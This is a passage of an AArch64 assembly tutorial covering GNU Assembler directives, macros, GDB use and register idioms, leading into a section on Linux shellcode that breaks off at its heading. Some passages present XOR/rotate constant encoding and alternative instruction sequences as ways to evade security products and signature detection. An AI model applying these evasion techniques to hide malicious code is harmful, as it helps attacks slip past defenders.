Testing for TRUE or FALSE after calling a subroutine is so common, that it makes perfect sense to have conditional branch instructions such as TBZ/TBNZ and CBZ/CBNZ. The only instruction that comes close to these on x86 would be JCXZ that jumps if the value of the CX register is zero. However, x86 subroutines normally return results in the accumulator (AX) and the counter register (CX) is normally used for iterations/loops.
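
As a rough guide, the four compare-and-branch instructions correspond to the following C predicates. This is only a sketch; the *_taken names are hypothetical and each function simply reports whether the branch would be taken for a given register value.

```c
#include <stdbool.h>
#include <stdint.h>

/* cbz Rn, label: branch if the whole register is zero. */
bool cbz_taken(uint64_t rn)  { return rn == 0; }

/* cbnz Rn, label: branch if the register is not zero. */
bool cbnz_taken(uint64_t rn) { return rn != 0; }

/* tbz Rn, #bit, label: branch if the selected bit is clear (bit is 0..63). */
bool tbz_taken(uint64_t rn, unsigned bit)  { return ((rn >> bit) & 1) == 0; }

/* tbnz Rn, #bit, label: branch if the selected bit is set (bit is 0..63). */
bool tbnz_taken(uint64_t rn, unsigned bit) { return ((rn >> bit) & 1) != 0; }
```

Testing bit 63 (or bit 31 of a w register) with TBNZ is a compact way to branch on a negative return value without touching the flags.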

2.7 System

The main system instruction for shellcodes is the supervisor call SVC

Mnemonic Instruction
MSR Move general-purpose register to System Register allows the PE to write an AArch64 System register from a general-purpose register.
MRS Move System Register allows the PE to read an AArch64 System register into a general-purpose register.
SVC Supervisor Call causes an exception to be taken to EL1.
NOP No Operation does nothing, other than advance the value of the program counter by 4. This instruction can be used for instruction alignment purposes.

There’s a special-purpose register that allows you to read and write to the conditional flags called NZCV.

  // read the condition flags
  .equ OVERFLOW_FLAG, 1 << 28
  .equ CARRY_FLAG,    1 << 29
  .equ ZERO_FLAG,     1 << 30
  .equ NEGATIVE_FLAG, 1 << 31

  mrs    x0, nzcv

  // set the C flag
  mov    w0, CARRY_FLAG
  msr    nzcv, x0

2.8 x86 and A64 comparison

The following table lists x86 instructions and their equivalent for A64. It’s not a comprehensive list by any means. It’s mainly the more common instructions you’ll likely use or see in disassembled code. In some cases, x86 does not have an equivalent instruction and is therefore not included.

x86 Mnemonic A64 Mnemonic Instruction
MOVZX UXT Zero-Extend.
MOVSX SXT Sign-Extend.
BSWAP REV Reverse byte order.
SHR LSR Logical Shift Right.
SHL LSL Logical Shift Left.
XOR EOR Bitwise exclusive-OR.
OR ORR Bitwise OR.
NOT MVN Bitwise NOT.
SHRD EXTR Double precision shift right / Extract register from pair of registers.
SAR ASR Arithmetic Shift Right.
SBB SBC Subtract with Borrow / Subtract with Carry
TEST TST Perform a bitwise AND, set flags and discard result.
CALL BL Branch with Link / Call a subroutine.
JNE BNE Jump/Branch if Not Equal.
JS BMI Jump/Branch if Signed / Minus.
JG BGT Jump/Branch if Greater.
JGE BGE Jump/Branch if Greater or Equal.
JE BEQ Jump/Branch if Equal.
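JC BCS / BHS Jump/Branch if Carry. After a subtraction or comparison the A64 carry flag is the inverse of the x86 one (it means no borrow), so BHS corresponds to JAE/JNB there.
JNC BCC / BLO Jump/Branch if No Carry. After a subtraction or comparison, BLO corresponds to JB.
JNS BPL Jump if Not Signed / Branch if Plus, positive or zero.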

3. GNU Assembler

The GNU toolchain includes the compiler collection (gcc), debugger (gdb), the C library (glibc), an assembler (gas) and linker (ld). The GNU Assembler (GAS) supports many architectures, so if you’re just starting to write ARM assembly, I cannot currently recommend a better assembler for Linux. Having said that, readers may wish to experiment with other products.

3.1 Preprocessor Directives

The following directives are what I personally found the most useful when writing assembly code with GAS.

Directive Instruction
.arch name Specifies the target architecture. The assembler will issue an error message if an attempt is made to assemble an instruction which will not execute on the target architecture. Examples include: armv8-a, armv8.1-a, armv8.2-a, armv8.3-a, armv8.4-a. Equivalent to the -march option in GCC.
.cpu name Specifies the target processor. The assembler will issue an error message if an attempt is made to assemble an instruction which will not execute on the target processor. Examples include: cortex-a53, cortex-a76. Equivalent to the -mcpu option in GCC.
.include “file” Include assembly code from “file”.
.macro name arguments Allows you to define macros that generate assembly output.
.if .if marks the beginning of a section of code which is only considered part of the source program being assembled if the argument (which must be an absolute expression) is non-zero. The end of the conditional section of code must be marked by .endif
.global Tells the assembler the function is publicly accessible.
.equ symbol, expression Equate. Define a symbolic constant. Equivalent to the #define directive in C.
.set symbol, expression Set the value of symbol to expression. If symbol was flagged as external, it remains flagged. Similar to the equate directive (.EQU) except the value can be changed later.
name .req register name This creates an alias for register name called name. For example: A .req x0
.size Tells the assembler how much space a function or object is using. If a function is unused, the linker can exclude it.
.struct expression Switch to the absolute section, and set the section offset to expression, which must be an absolute expression.
.skip size, fill This directive emits size bytes, each of value fill. Both size and fill are absolute expressions. If the comma and fill are omitted, fill is assumed to be zero. This is the same as ‘.space’.
.space size, fill This directive emits size bytes, each of value fill. Both size and fill are absolute expressions. If the comma and fill are omitted, fill is assumed to be zero. This is the same as ‘.skip’.
.text subsection Tells as to assemble the following statements onto the end of the text subsection numbered subsection, which is an absolute expression. If subsection is omitted, subsection number zero is used.
.data subsection .data tells as to assemble the following statements onto the end of the data subsection numbered subsection (which is an absolute expression). If subsection is omitted, it defaults to zero.
.bss Section for uninitialized data.
.align abs-expr , abs-expr , abs-expr Pad the location counter (in the current subsection) to a particular storage boundary. The first expression (which must be absolute) is the alignment required, as described below. The second expression (also absolute) gives the fill value to be stored in the padding bytes. It (and the comma) may be omitted. If it is omitted, the padding bytes are normally zero. However, on some systems, if the section is marked as containing code and the fill value is omitted, the space is filled with no-op instructions. The third expression is also absolute, and is also optional. If it is present, it is the maximum number of bytes that should be skipped by this alignment directive. If doing the alignment would require skipping more bytes than the specified maximum, then the alignment is not done at all. You can omit the fill value (the second argument) entirely by simply using two commas after the required alignment; this can be useful if you want the alignment to be filled with no-op instructions when appropriate.
.ascii “string” .ascii expects zero or more string literals separated by commas. It assembles each string (with no automatic trailing zero byte) into consecutive addresses.
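.hidden names Overrides the default visibility of the named symbols and makes them hidden, so they are not visible to other components. (Not to be confused with RoboCop’s hidden directive: any attempt to arrest a senior OCP employee results in shutdown.)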
.asciz “string” .asciz is just like .ascii, but each string is followed by a zero byte. The “z” in ‘.asciz’ stands for “zero”.
.string str, .string8 str, .string16 str The variants string16, string32 and string64 differ from the string pseudo opcode in that each 8-bit character from str is copied and expanded to 16, 32 or 64 bits respectively. The expanded characters are stored in target endianness byte order.
.byte Declares a variable of 8-bits.
.hword/.2byte Declares a variable of 16-bits. The second ensures only 16-bits.
.word/.4byte Declares a variable of 32-bits. The second ensures only 32-bits.
.quad/.8byte Declares a variable of 64-bits. The second ensures only 64-bits.

3.2 GCC Assembly

GCC can be incredibly useful when first starting to learn any assembly language because it provides an option to generate assembly output from source code using the -S option. If you want to generate assembly with source code, compile with -g and -c options, then dump with objdump -d -S. Most people want their applications optimized for speed rather than size, so it stands to reason the GNU C optimizer is not terribly efficient at generating compact code. Our new A.I overlords might be able to change all that, but at least for now, a human wins at writing compact assembly code.

To illustrate, here’s a subroutine that does nothing useful.

#include <stdio.h>

void calc(int a, int b) {
    int i;
    
    for(i=0;i<4;i++) {
      printf("%i\n", ((a * i) + b) % 5);
    }
}

Compile this code using the -Os option to optimize for size. The following assembly is generated by GCC. Recall that x30 is the link register and is saved here because of the call to printf. We also have to use callee-saved registers x19-x23 for storing variables because x0-x18 are trashed by the call to printf.

	.arch armv8-a
	.file	"calc.c"
	.text
	.align	2
	.global	calc
	.type	calc, %function
calc:
	stp	x29, x30, [sp, -64]!    // store x29, x30 (LR) on stack
	add	x29, sp, 0              // x29 = sp
	stp	x21, x22, [sp, 32]      // store x21, x22 on stack
	adrp	x21, .LC0               // x21 = 4KB page address of "%i\n"
	stp	x19, x20, [sp, 16]      // store x19, x20 on stack
	mov	w22, w0                 // w22 = a
	mov	w19, w1                 // w19 = b
	add	x21, x21, :lo12:.LC0    // x21 += low 12 bits of the .LC0 address
	str	x23, [sp, 48]           // store x23 on stack
	mov	w20, 4                  // i = 4
	mov	w23, 5                  // divisor = 5 for modulus
.L2:
	sdiv	w1, w19, w23            // w1 = b / 5
	mov	x0, x21                 // x0 = "%i\n"
	add	w1, w1, w1, lsl 2       // w1 *= 5
	sub	w1, w19, w1             // w1 = b - ((b / 5) * 5)
	add	w19, w19, w22           // b += a
	bl	printf

	subs	w20, w20, #1            // i = i - 1
	bne	.L2                     // while (i != 0)

	ldp	x19, x20, [sp, 16]      // restore x19, x20
	ldp	x21, x22, [sp, 32]      // restore x21, x22
	ldr	x23, [sp, 48]           // restore x23
	ldp	x29, x30, [sp], 64      // restore x29, x30 (LR)
	ret                             // return to caller

	.size	calc, .-calc
	.section	.rodata.str1.1,"aMS",@progbits,1
.LC0:
	.string	"%i\n"
	.ident	"GCC: (Debian 6.3.0-18) 6.3.0 20170516"
	.section	.note.GNU-stack,"",@progbits

i is initialized to 4 instead of 0 and decreased rather than increased. There’s no modulus instruction in the A64 set, and division instructions don’t produce a remainder, so the calculation is performed using a combination of division, multiplication and subtraction. The modulo operation is calculated with the following : R = N - ((N / D) * D)

N denotes the numerator/dividend, D denotes the divisor and R denotes the remainder. The following assembly code is how it might be written by hand. The most notable change is using the msub instruction in place of a separate add and sub.

        .arch armv8-a
	.text
	.align 2
	.global calc

calc:
        stp   x19, x20, [sp, -48]!
        stp   x21, x22, [sp, 16]
        stp   x23, x30, [sp, 32]

	mov   w19, w0           // w19 = a
	mov   w20, w1           // w20 = b
        mov   w21, 4            // i = 4 
	mov   w22, 5            // set divisor
.LC2:
	sdiv  w1, w20, w22      // w1 = b / 5
	msub  w1, w1, w22, w20  // w1 = b - ((b / 5) * 5)
	adr   x0, .LC0          // x0 = "%i\n"
	bl    printf

        add   w20, w20, w19     // b += a	
	subs  w21, w21, 1       // i = i - 1
	bne   .LC2              // 

        ldp   x19, x20, [sp], 16
	ldp   x21, x22, [sp], 16
        ldp   x23, x30, [sp], 16
	ret
.LC0:
	.string "%i\n"

Use compiler generated assembly as a guide, but try to improve upon the code as shown in the above example.
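
The remainder identity used by both listings, R = N - ((N / D) * D), is easy to check in C. The sketch below assumes a non-zero divisor and stays away from the INT32_MIN / -1 case; remainder_by_msub is just an illustrative name.

```c
#include <stdint.h>

/* R = N - ((N / D) * D), mirroring the sdiv + msub pair.
   d must not be zero. */
int32_t remainder_by_msub(int32_t n, int32_t d)
{
    int32_t q = n / d;    /* sdiv: quotient truncated toward zero */
    return n - (q * d);   /* msub: n - (q * d)                    */
}
```

Because both sdiv and the C division operator truncate toward zero, the result has the same sign as the dividend, just like the % operator.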

3.3 Symbolic Constants

What if we want to use symbolic constants from C header files in our assembler code? There are two options.

  1. Convert each symbolic constant to its GAS equivalent using the .EQU or .SET directives. Very time consuming.
  2. Use C-style #include directive and pre-process using GNU CPP. Quicker with several advantages.

Obviously the second option is less painful and less likely to produce errors. Of course, I’m not discounting the possibility of automating the first option, but why bother? CPP has an option that will do it for us. Let’s see what the manual says.

Instead of the normal output, -dM will generate a list of #define directives for all the macros defined during the execution of the preprocessor, including predefined macros. This gives you a way of finding out what is predefined in your version of the preprocessor.

So, -dM will dump all the #define macros and -E will preprocess a file, but not compile, assemble or link. So, the steps to using symbolic names in our assembler code are:

  1. Use cpp -dM to dump all the #defined keywords from each include header.
  2. Use sort and uniq -u to remove duplicates.
  3. Use the #include directive in our assembly source code.
  4. Use cpp -E to preprocess and pipe the output to a new assembly file. (-o is an output option)
  5. Assemble using as to generate an object file.
  6. Link the object file to generate an executable.

The following is some simple code that displays Hello, World! to the console.

#include "include.h"

        .global _start
        .text

_start:
        mov    x8, __NR_write
        mov    x2, hello_len
        adr    x1, hello_txt
        mov    x0, STDOUT_FILENO
        svc    0

        mov    x8, __NR_exit
        svc    0

        .data

hello_txt: .ascii "Hello, World!\n"
hello_len = . - hello_txt

Preprocess the above source using CPP -E. The result of this will be replacing each symbolic constant used with its assigned numeric value.

Finally, assemble using GAS and link with LD.

The following two directives are examples of simple text substitution or symbolic constants.

  #define FALSE 0
  #define TRUE  1

The equivalent can be accomplished with the .EQU or .SET directives in GAS.

  .equ TRUE, 1
  .set TRUE, 1
  
  .equ FALSE, 0
  .set FALSE, 0

Personally, I think it makes more sense to use the C preprocessor, but it’s entirely up to yourself.

3.4 Structures and Unions

A structure in programming is incredibly useful for combining different data types into a single user-defined data type. One of the major pitfalls in programming any assembly is poorly managed memory access. In my own experience, MASM always had the best support for data structures. NASM and YASM could be much better. Unfortunately, support for structures in GAS isn’t great. Understandably, many of the hand-written assembly programs for Linux normally use global variables that are placed in the .data section of a source file. For a Position Independent Code (PIC) or thread-safe application that can only use local variables allocated on the stack, a data structure helps as a reference to manage those variables. Assigning names helps clarify what each stack address is for, and improves overall quality. It’s also much easier to modify code by simply re-arranging the elements of a structure later.

Take for example the following C structure dimension_t that requires conversion to GAS assembly syntax.

typedef struct _dimension_t {
  int x, y;
} dimension_t;

The closest directive to the struct keyword is .struct. Unfortunately, this directive doesn’t accept a name, nor does it allow members to be enclosed between .struct and .ends, which some of you might be familiar with from YASM/NASM. This directive only accepts an offset as a start position.

        .struct 0
dimension_t.x:
        .struct dimension_t.x + 4
dimension_t.y:
        .struct dimension_t.y + 4
dimension_t_size:

An alternate way of defining the above structure can be done with the .skip or .space directives.

        .struct 0
dimension_t.x: .skip 4
dimension_t.y: .skip 4
dimension_t_size:

If we have to manually define the size of each field in the structure, it seems the .struct directive is of little use. Consider using the #define keyword and preprocessing the file before assembling. Note that a macro name cannot contain a period, so the members are named with underscores here.

#define dimension_t_x 0
#define dimension_t_y 4
#define dimension_t_size 8

For a union, it doesn’t get any better than what I suggest be used for structures. We can use the .set or .equ directives or refer back to a combination of using #define and cpp. Support for both unions and structures in GAS leaves a lot to be desired.
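
One way to avoid typing offsets by hand is to let the C compiler compute them and print the directives for you. The following is a minimal sketch of that idea using offsetof; emit_dimension_offsets and the dimension_t_* symbol names are my own choices for illustration, and the output would still need to be written to a file that the assembly source includes.

```c
#include <stddef.h>
#include <stdio.h>

typedef struct _dimension_t {
    int x, y;
} dimension_t;

/* Writes GAS .equ lines describing dimension_t into buf.
   Returns the snprintf result (the number of characters needed). */
int emit_dimension_offsets(char *buf, size_t len)
{
    return snprintf(buf, len,
                    ".equ dimension_t_x, %zu\n"
                    ".equ dimension_t_y, %zu\n"
                    ".equ dimension_t_size, %zu\n",
                    offsetof(dimension_t, x),
                    offsetof(dimension_t, y),
                    sizeof(dimension_t));
}
```

The advantage is that padding and alignment are whatever the compiler actually uses for the target, so the offsets can't drift out of sync with the C header. The helper has to be built for the same target ABI as the assembly code.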

3.5 Operators

From time to time I’ll see some mention of “polymorphic” shellcodes where the author attempts to hide or obfuscate strings using simple arithmetic or bitwise operations. Usually the obfuscation is done via a bit rotation or exclusive-OR and this presumably helps evade detection by some security products.

Operators are arithmetic functions, like + or %. Prefix operators take one argument. Infix operators take two arguments, one on either side. Operators have precedence, but operations with equal precedence are performed left to right.

Precedence Operators
Highest Multiplication (*), Division (/), Remainder (%), Shift Left (<<), Right Shift (>>).
Intermediate Bitwise inclusive-OR (|), Bitwise And (&), Bitwise Exclusive-OR (^), Bitwise Or Not (!).
Low Addition (+), Subtraction (-), Equal To (==), Not Equal To (!=), Less Than (<), Greater Than (>), Greater Than Or Equal To (>=), Less than Or Equal To (<=).
Lowest Logical And (&&). Logical Or (||).

The following examples show a number of ways to use operators prior to assembly. These examples just load the immediate value 0x12345678 into the w0 register.

    // exclusive-OR
    movz    w0, 0x5678 ^ 0x4823
    movk    w0, 0x1234 ^ 0x5412, lsl 16
    movz    w1, 0x4823
    movk    w1, 0x5412, lsl 16
    eor     w0, w0, w1

    // rotate a value left by 5 bits using MOVZ/MOVK
    movz    w0,  (0x12345678 << 5)        |  (0x12345678 >> (32-5)) & 0xFFFF
    movk    w0, ((0x12345678 << 5) >> 16) | ((0x12345678 >> (32-5)) >> 16) & 0xFFFF, lsl 16
    // then rotate right by 5 to obtain original value
    ror     w0, w0, 5

    // right rotate using LDR
    .equ    ROT, 5

    ldr     w0, =(0x12345678 << ROT) | (0x12345678 >> (32 - ROT)) & 0xFFFFFFFF
    ror     w0, w0, ROT

    // bitwise NOT
    ldr     w0, =~0x12345678
    mvn     w0, w0

    // negation
    ldr     w0, =-0x12345678
    neg     w0, w0
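
Each of these tricks relies on an operation that undoes itself, which can be sanity-checked in C before committing it to assembly. The sketch below assumes 32-bit values; rol32, ror32 and the decode_* helpers are illustrative names for what the assembler expression (encode) and the run-time instruction (decode) compute.

```c
#include <stdint.h>

/* Rotate helpers for 32-bit values; n must be in the range 1..31. */
uint32_t rol32(uint32_t v, unsigned n) { return (v << n) | (v >> (32 - n)); }
uint32_t ror32(uint32_t v, unsigned n) { return (v >> n) | (v << (32 - n)); }

/* Each function takes the encoded constant that the assembler expression
   would produce and applies the instruction that decodes it at run time. */
uint32_t decode_xor(uint32_t enc, uint32_t key) { return enc ^ key; }      /* eor */
uint32_t decode_ror(uint32_t enc, unsigned n)   { return ror32(enc, n); }  /* ror */
uint32_t decode_not(uint32_t enc)               { return ~enc; }           /* mvn */
uint32_t decode_neg(uint32_t enc)               { return 0u - enc; }       /* neg */
```

For example, decode_ror(rol32(value, 5), 5) should give back value, which is the same round trip as the MOVZ/MOVK and ROR sequence above.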
    

3.6 Macros

If we need to repeat a number of assembly instructions, but with different parameters, using macros can be helpful. For example, you might want to eliminate branches in a loop to make code faster. Let’s say you want to load a 32-bit immediate value into a register. ARM instruction encodings are all 32-bits, so it isn’t possible to load anything more than a 16-bit immediate. Some immediate values can be stored in the literal pool and loaded using LDR, but if we use just MOV instructions, here’s how to load the 32-bit number 0x12345678 into register w0.

  movz    w0, 0x5678
  movk    w0, 0x1234, lsl 16

The first instruction MOVZ loads 0x5678 into w0, zero extending to 32-bits. MOVK loads 0x1234 into the upper 16-bits using a shift, while preserving the lower 16-bits. Some assemblers provide a pseudo-instruction called MOVL that expands into the two instructions above. However, the GNU Assembler doesn’t recognize it, so here are two macros for GAS that can load a 32-bit or 64-bit immediate value into a general purpose register.

  // load a 64-bit immediate using MOV
  .macro movq Xn, imm
      movz    \Xn,  \imm & 0xFFFF
      movk    \Xn, (\imm >> 16) & 0xFFFF, lsl 16
      movk    \Xn, (\imm >> 32) & 0xFFFF, lsl 32
      movk    \Xn, (\imm >> 48) & 0xFFFF, lsl 48
  .endm

  // load a 32-bit immediate using MOV
  .macro movl Wn, imm
      movz    \Wn,  \imm & 0xFFFF
      movk    \Wn, (\imm >> 16) & 0xFFFF, lsl 16
  .endm

Then if we need to load a 32-bit immediate value, we do the following.

  movl    w0, 0x12345678
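
If it helps to see what the movq macro computes, here is a rough C model of the MOVZ/MOVK sequence. The helper names (imm_chunk, movk, movq_model) are hypothetical, and the shift is assumed to be 0, 16, 32 or 48 as in the macro.

```c
#include <stdint.h>

/* The 16-bit chunk that MOVZ/MOVK would place at shift 'lsl'. */
uint16_t imm_chunk(uint64_t imm, unsigned lsl)
{
    return (uint16_t)((imm >> lsl) & 0xFFFF);
}

/* movk: replace one 16-bit lane of 'reg' and keep the other lanes. */
uint64_t movk(uint64_t reg, uint16_t chunk, unsigned lsl)
{
    return (reg & ~((uint64_t)0xFFFF << lsl)) | ((uint64_t)chunk << lsl);
}

/* Rebuild the immediate the way the movq macro does:
   one movz followed by three movk instructions. */
uint64_t movq_model(uint64_t imm)
{
    uint64_t reg = imm_chunk(imm, 0);          /* movz zeroes the other lanes */
    reg = movk(reg, imm_chunk(imm, 16), 16);
    reg = movk(reg, imm_chunk(imm, 32), 32);
    reg = movk(reg, imm_chunk(imm, 48), 48);
    return reg;
}
```

A smarter macro could skip any MOVK whose chunk is zero, since MOVZ has already cleared those bits.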

Here are two more that imitate the PUSH and POP instructions. Of course, this only supports a single register, so you might want to write your own.

  // imitate a push operation
  .macro push Rn:req
      str     \Rn, [sp, -16]!
  .endm

  // imitate a pop operation
  .macro pop Rn:req
      ldr     \Rn, [sp], 16
  .endm

3.7 Conditional assembly

Like the GNU C compiler, GAS provides support for if-else preprocessor directives. The following shows an example in C.

    #ifdef BIND
      // compile code to bind
    #else
      // compile code to connect
    #endif

Next, an example for GAS.

    .ifdef BIND
      // assemble code to bind
    .else
      // assemble code for connect
    .endif

GAS also supports something similar to the #ifndef directive in C.

    .ifnotdef BIND
      // assemble code for connect
    .else
      // assemble code for bind
    .endif

3.8 Comments

These are ignored by the assembler and are intended to explain what the code does. C style comments /* */ or C++ style // are a good choice. The at sign (@) and hash (#) are also used by GAS (@ is the comment character for 32-bit ARM rather than AArch64, and # starts a comment at the beginning of a line), however, you should know that when using the preprocessor on assembly source code, comments that start with the hash symbol can be problematic. I tend to use C++ style for single line comments and C style for comment blocks.

  # This is a comment

  // This is a comment

  /*
    This is a comment
  */

  @ This is a comment.

4. GNU Debugger

Sometimes it’s necessary to closely monitor the execution of code to find the location of a bug. This is normally accomplished via breakpoints and single-stepping through each instruction.

4.1 Layout

There are various front ends for GDB that are intended to enhance debugging. Personally I don’t use GDB enough to be familiar with any of them. The setup I have is simply a split layout that shows disassembly and registers. This has worked well enough for what I need writing these simple codes, but you may want to experiment with the front ends. The following screenshot is what a split layout looks like.

To set up a split layout, save the following to $HOME/.gdbinit

layout split
layout regs

4.2 Commands

The following are a number of commands I’ve found useful for writing code.

Command Description
stepi Step into instruction.
nexti Step over instruction. (skips calls to subroutines)
set follow-fork-mode child Debug child process.
set follow-fork-mode parent Debug parent process.
layout split Display the source, assembly, and command windows.
layout regs Display registers window.
break <address> Set a breakpoint on address.
refresh Refresh the screen layout.
tty [device] Specifies the terminal device to be used for the debugged process.
continue Continue with execution.
run Run program from start.
define Combine commands into single user-defined command.

During execution of code, the window may become unstable. One way around this is to use the ‘refresh’ command, however, that probably only corrects it once. You can use the ‘define’ command to combine multiple commands into one macro.

(gdb) define stepx
Type commands for definition of "stepx".
End with a line saying just "end".
>stepi
>refresh
>end
(gdb) 

This works, but it’s not ideal. The screen will still bump. The best workaround I could find is to create a new terminal window. Obtain the TTY and use this in GDB. e.g. tty /dev/pts/1

5. Common Operations

Initializing or checking the contents of a register are very common operations in any assembly language. Knowing multiple ways to perform these actions can potentially help evade signature detection tools. What I show here isn’t an extensive list of ways by any means because there are umpteen ways to perform any operation, it just depends on how many instructions you wish to use.

5.1 Saving Registers

We can freely use 19 registers without having to preserve them for the caller. Compare this with x86 where only 3 registers are available or 5 for AMD64. One minor annoyance with ARM is calling subroutines. Unlike Intel CPUs, ARM doesn’t store a return address on the stack. It stores the return address in the Link Register (LR) which is an alias for the x30 register. A callee is expected to save LR/x30 if it calls a subroutine. Not doing so will cause problems. If you migrate from ARM32, you’ll miss the convenience of push and pop to save registers. These instructions have been deprecated in favour of load and store instructions, so we need to use STR/STP to save and LDR/LDP to restore. Here’s how you can save/restore registers using the stack.

    // push {x0}
    // [base - 16] = x0
    // base = base - 16
    str    x0, [sp, -16]!

    // pop {x0}
    // x0 = [base]
    // base = base + 16
    ldr    x0, [sp], 16

    // push {x0, x1}
    stp    x0, x1, [sp, -16]!

    // pop {x0, x1}
    ldp    x0, x1, [sp], 16

You might be wondering why 16 is used to store one register. The stack must always be aligned by 16 bytes. Unaligned access can cause exceptions.

5.2 Copying Registers

The first example here is the “normal” way and the rest are a few alternatives.

    // Move x1 to x0
    mov     x0, x1

    // Extract bits 0-63 (a width of 64) from x1 and store in x0 zero extended.
    ubfx   x0, x1, 0, 64

    // x0 = (x1 & ~0)
    bic    x0, x1, xzr

    // x0 = x1 >> 0
    lsr    x0, x1, 0

    // Use a circular shift (rotate) to move x1 to x0
    ror    x0, x1, 0
    
    // Extract bits 0-63 (a width of 64) from x1 and insert into x0
    bfxil  x0, x1, 0, 64

5.3 Initialize register to zero.

This is normally needed to initialize a counter (i = 0) or to pass NULL/0 to a system call. Each one of these instructions will do that.

    // Move an immediate value of zero into the register.
    mov    x0, 0

    // Copy the zero register.
    mov    x0, xzr

    // Exclusive-OR the register with itself.
    eor    x0, x0, x0

    // Subtract the register from itself.
    sub    x0, x0, x0

    // Mask the register with zero register using a bitwise AND.
    // An immediate of zero won't work here; 0 can't be encoded as a bitmask immediate.
    and    x0, x0, xzr

    // Multiply the register by the zero register.
    mul    x0, x0, xzr

    // Extract 64 bits from xzr and place in x0.
    bfxil  x0, xzr, 0, 64
    
    // Circular shift (rotate) right.
    ror    x0, xzr, 0

    // Logical shift right.
    lsr    x0, xzr, 0
    
    // Reverse bytes of zero register.
    rev    x0, xzr

5.4 Initialize register to 1.

Rarely does a counter start at 1, but it’s a common enough value to pass to a system call.

    // Move 1 into x0.
    mov     x0, 1

    // Compare x0 with x0 and set x0 if equal.
    cmp     x0, x0
    cset    x0, eq

    // Bitwise NOT the zero register and store in x0. Negate x0.
    mvn     x0, xzr
    neg     x0, x0

5.5 Initialize register to -1.

Some system calls require this value.

    // move -1 into register
    mov     x0, -1

    // copy the zero register inverted
    mvn     x0, xzr

    // x0 = ~(x0 ^ x0)
    eon     x0, x0, x0

    // x0 = (x0 | ~xzr)
    orn     x0, x0, xzr

    // x0 = (int64_t)(int8_t)0xFF
    mov     w0, 255
    sxtb    x0, w0

    // x0 = (x0 == x0) ? -1 : 0
    cmp     x0, x0
    csetm   x0, eq
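
To double-check sequences like these without a board to hand, the instructions can be modelled in C. This is only a sketch of their documented behaviour, with function names of my own choosing.

```c
#include <stdint.h>

// Model of SXTB Xd, Wn: sign-extend the low byte to 64 bits.
static int64_t sxtb(uint32_t w) {
    return (int64_t)((w & 0xFF) ^ 0x80) - 0x80;
}

// Model of CSETM Xd, cond: all ones when the condition holds, else zero.
static int64_t csetm(int cond) {
    return cond ? -1 : 0;
}

// Model of EON Xd, Xn, Xm: exclusive-OR with the complement of Xm.
static uint64_t eon(uint64_t n, uint64_t m) {
    return n ^ ~m;
}
```

Sign-extending 255 and EON of any value with itself both give all ones, which is -1 in two’s complement.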

5.6 Initialize register to 0x80000000.

This might seem vague now, but an algorithm like X25519 uses this value for its reduction step.

    mov     w0, 0x80000000

    // Set bit 31 of w0.
    mov     w0, 1
    lsl     w0, w0, 31

    // Set bit 31 of w0.
    mov     w0, 1
    ror     w0, w0, 1

    // Set bit 31 of w0.
    mov     w0, 1
    rbit    w0, w0

    // Set bit 31 of w0.
    eon     w0, w0, w0
    lsr     w0, w0, 1
    add     w0, w0, 1
    
    // Set bit 31 of w0.
    mov     w0, -1
    extr    w0, w0, wzr, 1
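
The less obvious variants (ROR, RBIT and EXTR) can be checked with a small C model. The functions below are a sketch of the documented 32-bit behaviour, not code from the original article.

```c
#include <stdint.h>

// Model of ROR Wd, Wn, #s (s in 0..31).
static uint32_t ror32(uint32_t v, unsigned s) {
    s &= 31;
    return s ? (v >> s) | (v << (32 - s)) : v;
}

// Model of RBIT Wd, Wn: reverse the order of all 32 bits.
static uint32_t rbit32(uint32_t v) {
    uint32_t r = 0;
    for (int i = 0; i < 32; i++) {
        r = (r << 1) | (v & 1);
        v >>= 1;
    }
    return r;
}

// Model of EXTR Wd, Wn, Wm, #lsb: take 32 bits starting at bit lsb
// of the 64-bit value formed by Wn (high half) and Wm (low half).
static uint32_t extr32(uint32_t hi, uint32_t lo, unsigned lsb) {
    uint64_t pair = ((uint64_t)hi << 32) | lo;
    return (uint32_t)(pair >> (lsb & 31));
}
```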

5.7 Testing for 1/TRUE.

A function returning TRUE normally indicates success, so these are some ways to test for that.

    // Compare x0 with 1, branch if equal.
    cmp     x0, 1
    beq     true

    // Compare x0 with zero register, branch if not equal.
    cmp     x0, xzr
    bne     true
    
    // Subtract 1 from x0 and set flags. Branch if equal. (Z flag is set)
    subs    x0, x0, 1
    beq     true

    // Negate x0 and set flags. Branch if the result is negative (x0 was positive).
    negs    x0, x0
    bmi     true

    // Conditional branch if x0 is not zero.
    cbnz    x0, true

    // Test bit 0 and branch if not zero.
    tbnz    x0, 0, true

5.8 Testing for 0/FALSE.

Normally we see a CMP instruction used in handwritten assembly code to evaluate this condition. This subtracts the source register from the destination register, sets the flags, and discards the result.

    // x0 == 0
    cmp     x0, 0
    beq     false

    // x0 == 0
    cmp     x0, xzr
    beq     false

    ands    x0, x0, x0
    beq     false

    // same as ANDS, but discards result
    tst     x0, x0
    beq     false

    // x0 == -0
    negs    x0, x0
    beq     false

    // (x0 - 1) == -1
    subs    x0, x0, 1
    bmi     false

    // if (!x0) goto false
    cbz     x0, false

    // if (!(x0 & 1)) goto false (only bit 0 is tested)
    tbz     x0, 0, false

5.9 Testing for -1

Some functions will return a negative number like -1 to indicate failure. CMN is used in the first example. This behaves exactly like CMP, except it is adding the source value (register or immediate) to the destination register, setting the flags and discarding the result.

    // w0 == -1
    cmn     w0, 1
    beq     failed

    // w0 < 0
    cmn     w0, wzr
    bmi     failed

    // negative?
    ands    w0, w0, w0
    bmi     failed

    // same as ANDS, but discards result
    tst     w0, w0
    bmi     failed

    // w0 & 0x80000000
    tbnz    w0, 31, failed
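
The branches above depend only on the N (negative) and Z (zero) flags. A small C model of how CMN and TST derive those two flags may help; it is a sketch that ignores the carry and overflow flags, and the names are mine.

```c
#include <stdint.h>

// The two condition flags the examples rely on.
struct nz { int n; int z; };

// Model of CMN Wn, Wm: add the operands, keep only the flags.
static struct nz cmn32(uint32_t a, uint32_t b) {
    uint32_t r = a + b;               // wraps modulo 2^32
    struct nz f = { (int)(r >> 31), r == 0 };
    return f;
}

// Model of TST Wn, Wm (ANDS with the result discarded).
static struct nz tst32(uint32_t a, uint32_t b) {
    uint32_t r = a & b;
    struct nz f = { (int)(r >> 31), r == 0 };
    return f;
}
```

Adding 1 to -1 wraps to zero and sets Z, which is what BEQ tests; any value with bit 31 set produces N, which is what BMI tests.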

6. Linux Shellcode

Developing an operating system, writing boot code, reverse engineering, or exploiting vulnerabilities: these are all valid reasons to learn assembly language. In the case of exploiting bugs, one needs to have a grasp of writing shellcodes. These are compact, position-independent pieces of code that use system calls to interact with the operating system.

6.1 System Calls

